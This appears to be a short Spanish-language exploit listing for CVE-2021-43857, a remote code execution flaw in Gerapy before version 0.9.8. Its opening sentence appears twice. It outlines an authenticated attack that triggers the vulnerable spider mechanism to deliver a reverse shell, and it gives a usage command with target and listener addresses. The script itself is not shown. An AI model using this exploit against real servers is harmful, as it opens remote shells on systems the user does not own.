
Gerapy anterior a la versión 0.9.8 es vulnerable a la ejecución remota de código. Este problema está corregido en la versión 0.9.8.
Gerapy anterior a la versión 0.9.8 es vulnerable a la ejecución remota de código. Este problema está corregido en la versión 0.9.8.
CVE-2021-43857 es una vulnerabilidad marcada con prioridad Crítica (CVSS 9.8) que conduce a la ejecución remota de código.
Esta vulnerabilidad afecta a todas las versiones anteriores a la 0.9.8.
Probada solo en la 0.9.6. Requiere credenciales correctas.
El exploit funciona iniciando sesión en la aplicación, luego obteniendo la lista de proyectos creados (fallará si no hay ninguno), y después usando la configuración del proyecto para ejecutar el mecanismo vulnerable spider enviando el payload de reverse shell.
Ejemplo de uso:
python3 cve-2021-43857.py -t 172.17.0.2 -p 8000 -L 172.17.0.1 -P 4444
